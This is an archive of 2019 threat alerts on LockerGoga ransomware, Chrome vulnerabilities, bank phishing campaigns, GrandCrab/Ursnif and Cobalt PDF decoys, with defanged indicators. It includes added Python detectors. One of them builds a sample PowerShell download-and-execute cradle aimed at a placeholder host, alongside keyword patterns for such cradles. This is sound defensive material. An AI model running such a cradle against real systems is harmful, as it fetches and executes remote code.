Archive for January, 2019

Rewterz Threat Alert – New LockerGoga Ransomware used in Cyber Attacks in Multiple Countries




SEVERITY: Cyber Crime
The new LockerGoga ransomware has been found, most notably, in a cyber attack on the French engineering consultancy Altran Technologies.


The distribution method of this ransomware is not clear yet. Once executed, it targets DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX and PDF files. Samples of this ransomware have been uploaded from Romania and the Netherlands, while its victims have been observed in five different countries.


The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption. Some researchers have called it a sloppy, slow ransomware that does not try to evade detection. Security researchers reported that it spawns a new process for each file it encrypts, which makes encryption very slow. Once it has encrypted a file, it appends the extension .locked to it and leaves a ransom note on the desktop like this:
Bleeping Computer suggests that the first rule of security researcher V should be considered when trying to detect this family of infections using Yara, in order to protect organizations from the LockerGoga ransomware.
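As a behavioural complement to the Yara approach, the following Python sketch is an added example (not part of the original alert and not Rewterz or Bleeping Computer code): it correlates the two behaviours described above, one child process per encrypted file and renames to a `.locked` suffix, over constructed endpoint telemetry. The pipe-separated log format, the burst threshold and the sample events are assumptions; the process name reuses the `svch0st.5817.exe` indicator from this alert.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample telemetry (not from the alert), one event per line:
# "timestamp|event|parent_image|detail". The behaviour described above shows
# up as a burst of children spawned by one image plus renames to ".locked".
ENC = "C:\\Temp\\svch0st.5817.exe"
SAMPLE_EVENTS = "\n".join(
    [f"2019-01-24T10:00:{s:02d}|ProcessCreate|{ENC}|{ENC} -i SM-abc -s"
     for s in range(0, 12, 2)]
    + [f"2019-01-24T10:00:{s:02d}|FileRename|{ENC}|C:\\Docs\\f{s}.docx -> "
       f"C:\\Docs\\f{s}.docx.locked" for s in range(1, 12, 2)]
    + ["2019-01-24T10:05:00|ProcessCreate|C:\\Windows\\explorer.exe|notepad.exe",
       "2019-01-24T10:06:00|FileRename|C:\\Windows\\explorer.exe|a.txt -> b.txt"])

def parse_events(text):
    """Parse pipe-separated lines into dicts, sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, parent, detail = line.split("|", 3)
        events.append({"ts": datetime.fromisoformat(ts), "kind": kind,
                       "parent": parent, "detail": detail})
    return sorted(events, key=lambda e: e["ts"])

def spawn_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Parent images that create >= threshold children inside any window."""
    recent, flagged = defaultdict(deque), set()
    for e in events:
        if e["kind"] != "ProcessCreate":
            continue
        q = recent[e["parent"]]
        q.append(e["ts"])
        while e["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged.add(e["parent"])
    return flagged

def locked_renames(events):
    """Parent images that rename files to a name ending in .locked."""
    return {e["parent"] for e in events if e["kind"] == "FileRename"
            and e["detail"].rsplit("->", 1)[-1].strip().lower().endswith(".locked")}

def suspect_encryptors(text, threshold=5):
    """Images showing both behaviours; either alone is a weaker signal."""
    events = parse_events(text)
    return sorted(spawn_bursts(events, threshold) & locked_renames(events))
```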
  • worker32
  • bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f_wQkb8SOVnc[.]bin
  • svch0st[.]5817[.]exe
  • svch0st[.]11077[.]exe



Email Address


  • CottleAkela[@]protonmail[.]com
  • QyavauZehyco1994[@]o2[.]pl



Malware Hash (MD5/SHA1/SHA256)


  • bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f
  • 52340664fe59e030790c48b66924b5bd
  • 73171ffa6dfee5f9264e3d20a1b6926ec1b60897
Block the threat indicators at their respective controls and keep your systems up to date. Since the attack vector is still unknown, running products with known vulnerabilities increases the risk of attack by a malicious entity.


Rewterz Threat Advisory – Google Releases Security Updates for Chrome Multiple Vulnerabilities




CATEGORY: Vulnerability
Google has released security updates for Google Chrome addressing multiple vulnerabilities that an attacker could exploit to take control of an affected system. The new version for Windows, Mac and Linux contains 58 security fixes. The following vulnerabilities, ranging from Medium to High severity, have been addressed:

  • CVE-2019-5754: Inappropriate implementation in QUIC Networking
  • CVE-2019-5755: Inappropriate implementation in V8
  • CVE-2019-5756: Use after free in PDFium
  • CVE-2019-5757: Type Confusion in SVG
  • CVE-2019-5758: Use after free in Blink
  • CVE-2019-5759: Use after free in HTML select elements
  • CVE-2019-5760: Use after free in WebRTC
  • CVE-2019-5761: Use after free in SwiftShader
  • CVE-2019-5762: Use after free in PDFium
  • CVE-2019-5763: Insufficient validation of untrusted input in V8
  • CVE-2019-5764: Use after free in WebRTC
  • CVE-2019-5765: Insufficient policy enforcement in the browser
  • CVE-2019-5766: Insufficient policy enforcement in Canvas
  • CVE-2019-5767: Incorrect security UI in WebAPKs
  • CVE-2019-5768: Insufficient policy enforcement in DevTools
  • CVE-2019-5769: Insufficient validation of untrusted input in Blink
  • CVE-2019-5770: Heap buffer overflow in WebGL
  • CVE-2019-5771: Heap buffer overflow in SwiftShader
  • CVE-2019-5772: Use after free in PDFium
  • CVE-2019-5773: Insufficient data validation in IndexedDB
  • CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing
  • CVE-2019-5775: Insufficient policy enforcement in Omnibox
  • CVE-2019-5776: Insufficient policy enforcement in Omnibox
  • CVE-2019-5777: Insufficient policy enforcement in Omnibox
  • CVE-2019-5778: Insufficient policy enforcement in Extensions
  • CVE-2019-5779: Insufficient policy enforcement in ServiceWorker
  • CVE-2019-5780: Insufficient policy enforcement
  • CVE-2019-5781: Insufficient policy enforcement in Omnibox
  • CVE-2019-5782: Inappropriate implementation in V8

Other issues addressed in the update include:

  • Use after free in FileAPI
  • Use after free in Mojo interface
  • Use after free in Payments
  • Stack buffer overflow in Skia



Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions and possibly take control of a system.
  • Code Execution
  • Security Bypass
  • System Access
Update to the latest version: Chrome 72.0.3626.81 for Windows, Mac and Linux, which contains a number of fixes and improvements.



If you think you’re a victim of a cyber-attack, immediately send an email to

Rewterz Threat Alert – Phishing Awareness For Employees and Customers of the Banking Industry




CATEGORY: Phishing 

Given the recent phishing campaigns observed attacking employees of the banking sector in Pakistan, it is highly likely that the same phishing attacks are targeting bank customers too. It is therefore recommended to urgently run awareness programs for employees as well as customers.


Phishing emails are fake emails that falsely claim the identity of a legitimate organization in order to steal credentials or personal information. Phishing mainly uses popular communication channels such as email, instant messaging and peer-to-peer communication, either obtaining sensitive information directly or luring victims into visiting fake websites.


The fake websites usually look very similar to the legitimate websites of the respective banks and cannot be recognised as malicious by an unsuspecting user. Information entered on such sites, such as usernames and passwords, can be used to carry out fraudulent activities like unauthorized transactions, or can be sold to fraud groups for further malicious activity.
  • Information Disclosure
  • Credential Theft
  • Account Compromise
  • Fraudulent Transactions
  • Do not share your account information (user name, password, account number, etc.) with anyone. Your bank already has your information and will never demand sensitive information via email.
  • Disable all kinds of auto-download options for incoming files and documents.
  • Your account will never be closed automatically, even if you have previously ignored your bank’s emails. Any email warning you about closure of your account is fake.
  • Never click a link or pop-up message received in an email to access your account. It is likely to redirect you to a fake log-in page.
  • If you want to access your online account, carefully type the legitimate URL in the browser address bar instead of following links.
  • Set up real-time scanning for viruses and automatic updates of virus definitions.
  • Bank employees should verify, before processing them, any transactions requested via alerts such as SMS or email that appear to come from the bank.
  • Be very careful while entering login information on any web page, and never try to log in on a site which you did not open intentionally.
  • If you receive any email or text that looks suspicious, report it immediately to the bank concerned.

Rewterz Threat Alert – GrandCrab and Ursnif Campaign Observed in the Wild




CATEGORY: Phishing
A campaign has been observed distributing both the Ursnif malware and the GrandCrab ransomware via malicious Word documents attached to phishing emails. The Word documents contain a VBS macro that executes a base64-encoded PowerShell script, which retrieves the files associated with the GrandCrab and Ursnif infections. The first payload downloaded and executed is a PowerShell command that downloads an additional PowerShell script; this second script contains a base64-encoded PE file which it injects into memory for execution. This PE file was identified as a variant of the GrandCrab ransomware. The second payload downloaded and executed via the VBS macro is the Ursnif executable, which is used for malicious activities such as gathering system information and harvesting credentials.
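An added example, not from the original alert and not the campaign’s own code: a Python triage helper that decodes a PowerShell `-EncodedCommand` argument (base64 of a UTF-16LE script, the form a macro-launched cradle like the one described typically uses), flags download-cradle keywords, and checks whether any base64 blob inside the decoded script decodes to an `MZ` (PE) header, the “base64 encoded PE file” stage above. The command line is constructed and the stage-2 URL is a placeholder.

```python
import base64
import re

# Constructed command line in the style of a macro-launched cradle (not taken
# from the alert). The -enc argument is base64 of a UTF-16LE PowerShell script
# that holds a download cradle and an embedded base64 PE stub (MZ header).
_PE_STUB = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()
INNER_SCRIPT = ("$c=New-Object Net.WebClient;"
                "IEX $c.DownloadString('http://example.invalid/stage2.ps1');"
                "$b=[Convert]::FromBase64String('" + _PE_STUB + "')")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode())

ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|"
                    r"Invoke-Expression|\bIEX\b|FromBase64String", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -enc/-EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def embedded_pe(script):
    """True if any long base64 run in the script decodes to bytes starting 'MZ'."""
    for blob in B64_BLOB.findall(script):
        try:
            if base64.b64decode(blob + "=" * (-len(blob) % 4))[:2] == b"MZ":
                return True
        except ValueError:
            continue
    return False

def triage(cmdline):
    """Summarise what a process command line reveals about this infection chain."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "cradle": [], "embedded_pe": False}
    return {"encoded": True,
            "cradle": sorted({m.lower() for m in CRADLE.findall(script)}),
            "embedded_pe": embedded_pe(script)}
```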
  • Leakage of system information
  • Loss of credentials
Malware Hash (MD5/SHA1/SHA256)
Block all URLs and IoCs at your respective controls.
Ensure antivirus software and associated files are up to date.
Always be suspicious of emails sent to users from unknown senders.

Rewterz Threat Alert: Fresher Phishing Campaigns Targeting Pakistani Bank Employees




CATEGORY: Phishing
Following the previous two phishing campaigns that spoofed Summit Bank and Bank Al-Habib, the streak continues: two more fresh campaigns are targeting bank employees in Pakistan. This time the attackers spoofed Faysal Bank’s internet banking site and Standard Chartered Bank. The email claiming to come from Faysal Bank looks like this:
On clicking “Click Here Now”, users are redirected to a malicious URL that looks very similar to the legitimate internet banking site of Faysal Bank. An unsuspecting user is unlikely to be able to tell the fake site from the original.
The second campaign of the day fakes the identity of Standard Chartered Bank and has targeted more than a hundred bank employees in Pakistan. The email pretending to come from Standard Chartered Bank looks like this:




The hyperlink in this email also redirects to a URL which again looks similar to the legitimate site.
However, this time the site asks for more information than just credentials. Once the information is provided, the user is redirected to the login page of the bank’s genuine website, without being logged in.
  • Credential Theft
  • Exposure of Personal Information



Indicators of Compromise
  • https[:]//cbd9[.]net/images/query/faysalmobit/faysalmobit[.]php
  • http[:]//blayzercommerce[.]com/wp-content/themes/twentysixteen/schartered/schartered[.]html



Email Address
Email Subject



  • Faysal Bank Account Locked
  • Standard Chartered Bank – Account Locked
The count of these phishing campaigns targeting bank employees in Pakistan and spoofing the identity of banks has reached four now. It is advised to strictly avoid opening irrelevant or unexpected emails, attachments and URLs even if the source looks as legitimate as a financial organization.

Rewterz Threat Alert: The Cobalt gang exploiting Google App Engine to distribute malware through PDF decoy documents
Known for targeting financial organizations, the Cobalt gang has resurfaced with another malware-dropping campaign. About 42 targets from the financial and banking sector around the world have been attacked by this campaign, which drops malware via PDF decoys that abuse the App Engine service of the Google Cloud Platform (GCP).


The attackers abuse a GCP URL redirection inside the PDF decoys to send the victim to the URL hosting the malicious payload.
Because the link in the decoy points to Google App Engine, the URL appears more trustworthy to the targets. Most of the PDFs involved were created using Adobe Acrobat 18.0. The PDF decoy downloads a Word document containing obfuscated macro code; this document was downloaded from the URL https://transef[.]biz.
Once the download is complete, opening the document shows a message asking the user to enable editing and content in order to view it. When the option is enabled, the macro executes and downloads the next-stage payload.
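An added example (not from the original alert): a Python check that flags PDF link targets using the App Engine redirection described above, where a `continue` parameter on an `/_ah/` handler sends the victim outside Google-controlled hosts. The `*.appspot.com` host pattern and the `/_ah/logout` path are assumptions about the abused redirect; `example-app` and `evil.invalid` are placeholders, while transef.biz and Doc102018.doc come from this alert’s indicators.

```python
from urllib.parse import urlparse, parse_qs

# Assumption (not stated in the alert): the abused redirect is an App Engine
# /_ah/ handler (e.g. /_ah/logout) on a *.appspot.com host whose `continue`
# query parameter is followed once the handler completes.
GOOGLE_SUFFIXES = (".appspot.com", ".google.com", ".googleusercontent.com")

def appengine_redirect_target(url):
    """Return the off-Google destination if `url` is an App Engine /_ah/
    redirect whose continue= parameter leaves Google-controlled hosts,
    otherwise None. Protocol-relative targets (//host/...) are flagged too."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if p.scheme not in ("http", "https") or not host.endswith(".appspot.com"):
        return None
    if not p.path.startswith("/_ah/"):
        return None
    for target in parse_qs(p.query).get("continue", []):   # already %-decoded
        dest = urlparse(target)
        dhost = (dest.hostname or "").lower()
        if not dhost or dest.scheme not in ("", "http", "https"):
            continue   # relative paths stay on the app; odd schemes are skipped
        if not dhost.endswith(GOOGLE_SUFFIXES):
            return dest.geturl()
    return None

def flag_pdf_links(urls):
    """Map each suspicious link to the external destination it redirects to."""
    found = {}
    for u in urls:
        target = appengine_redirect_target(u)
        if target:
            found[u] = target
    return found

# Constructed sample links (placeholders: example-app, evil.invalid; transef.biz
# is the payload domain named in the alert).
SAMPLE_LINKS = [
    "https://example-app.appspot.com/_ah/logout?continue=https%3A%2F%2Ftransef.biz%2FDoc102018.doc",
    "https://example-app.appspot.com/_ah/logout?continue=https%3A%2F%2Fexample-app.appspot.com%2Fhome",
    "https://example-app.appspot.com/_ah/logout?continue=%2F%2Fevil.invalid%2Fx",
    "https://www.google.com/search?q=harmless",
]
```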
  • Code Execution
  • Malware Infection
  • fr[.]txt
  • Block the threat indicators at their respective controls.
  • Warn users against opening untrusted attachments, regardless of their extensions or filenames.
  • Warn users to avoid executing any file without confirming that it is not malicious.
  • Un-check the option “Remember this action for this site for all PDF documents” in the PDF reader software. A default-allow policy can let malware be downloaded even from trusted sites such as Google App Engine.

Copyright © Rewterz. All rights reserved.